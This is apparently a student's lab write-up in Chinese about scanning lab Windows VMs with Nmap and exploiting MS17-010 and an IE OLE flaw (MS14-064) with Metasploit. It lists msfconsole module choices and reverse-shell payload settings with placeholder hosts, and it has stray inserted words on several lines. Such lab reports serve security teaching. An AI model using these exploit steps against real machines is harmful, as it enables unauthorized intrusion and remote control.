靶機:windows 七、win十、windows xp SP3 english、python
(https://blog.csdn.net/qq_29277155/article/details/50977143) 此博客有較多闡述算法
Nmap是一個網絡鏈接端掃描軟件,用來掃描網上電腦開放的網絡鏈接端。肯定哪些服務運行在哪些鏈接端,而且推斷計算機運行哪一個操做系統(這是亦稱 fingerprinting)。它是網絡管理員必用的軟件之一,以及用以評估網絡系統安全。shell
在長達3.5年以後,Fyodor終於發佈了著名開源網絡檢索工具的最新版本Nmap7。Nmap是最受歡迎的開源網絡映射器之一此外,Nmap7這款自動化的掃描器可以輕易檢測到Heartbleed、POODLE、FREAK等嚴重漏洞。Nmap7中對ssl-enum-ciphers(SSL枚舉密碼)腳本替換了新的實現算法,使得它可以經過枚舉SSL/TLS協議版本和密碼套件來快速分析TLS鏈接,它還可以迅速識別部署問題。另外,使用Nmap7可以輕易發現包含漏洞的服務器,Nmap7中包含了對提速和掃描實現的改進。這個工具的新版本包括一個更新、更快的Nmap腳本引擎(Nmap Scripting Engine,NSE),同時它還容許用戶編寫Lua腳本。windows
使用namp 對這些被掃描工具掃描出來的漏洞進行人工手動驗證,這些僅是命令,至於如何根據出現的結果進行判斷是否有漏洞,這個在結果中很容易看出,例如出現 vulnerable-有漏洞; not vulnerable-無漏洞。 有結果出來-有漏洞;無結果出來-無漏洞,日後在其餘測試中,只須要將scanme.nmap.org 替換成帶驗證的目標IP 或者網站。瀏覽器
nmap --script=vuln xxxx
挖出了一個ms17_010漏洞安全
輸入: msfdb run 打開了msfconle
search ms17_010
注意第三個選項,這是我本身在exploit database 上下載下來的,而後導入到msf中的,但是沒想到也是基於ms17-010的,ruby
在本次實驗中我嘗試了第3、4、五個來對win7進行攻擊,效果很好,都成功了服務器
首先選擇的是本身從exploit database 上導入的 439(名字瞎編的) 網絡
輸入show options 後觀察須要設置的參數 set payload generic/shell_reverse_tcp set LHOST xxx set smbuser xxx set smbpass xxx
雖然結果成功了,可是這依然須要用戶名與密碼,我以爲這樣其實也不怎麼厲害session
接下來選擇用 windows/smb/ms17_010_psexec 與上面差很少
因爲對與上一步win7攻擊的成功,因而我用來攻擊IE
2015年3月微軟確認將放棄IE品牌。轉而在windows 10上,Microsoft Edge取代了,因此IE最終版是IE11(win10)
首先我預想的是攻擊win10,因此找了一個很新的漏洞,然而,大神是用python寫的。而想要導入msf中只能用.rb的文件,涼涼
因此,我以爲黑客的知識面應該是至關普遍的,廣而深的
在msf自帶的漏洞庫裏也有針對IE11的
然而攻擊效果是這樣的,什麼反應也沒有
而後不甘心的退而求其次,轉攻win7的IE7
而後我谷歌了一下。。。。。。。沒有解決。待定。。。。
後來上網搜了一下,知道了msf自動化測試,我以爲能夠試一試
search autopwn
而後選擇、設置,但是還出現了問題,永遠不知道下一步的探索
只好去測試xp
選擇了
use winndows/browser/ms14_064_ole_code_execution
set SRVHOST xxx set payload xxx set LHOST xxx exploit
而後在xp系統中打開ie,輸入url訪問,
成功的拿到了session ,測試成功
這個評價是excellent想必是不錯的啦
這個依然同上,使用show options 查看設置參數就ok
在靶機上訪問URL運行一下文件就OK
後經同窗指點知道一個鏈接網絡的方法: 將靶機與攻擊機都設置爲橋接模式,而後用手機開個熱點,但不開流量,這樣的話就至關與手機充當路由器的功能,並且不耗費流量,即可實現兩臺虛擬機的通訊,很贊。
由於有些代碼返回地址很難確認,因此在實際中有時候會填充一大段空指令,便於快速肯定返回地址的位置
實驗體會:
路漫漫其修遠兮,吾將上下而求索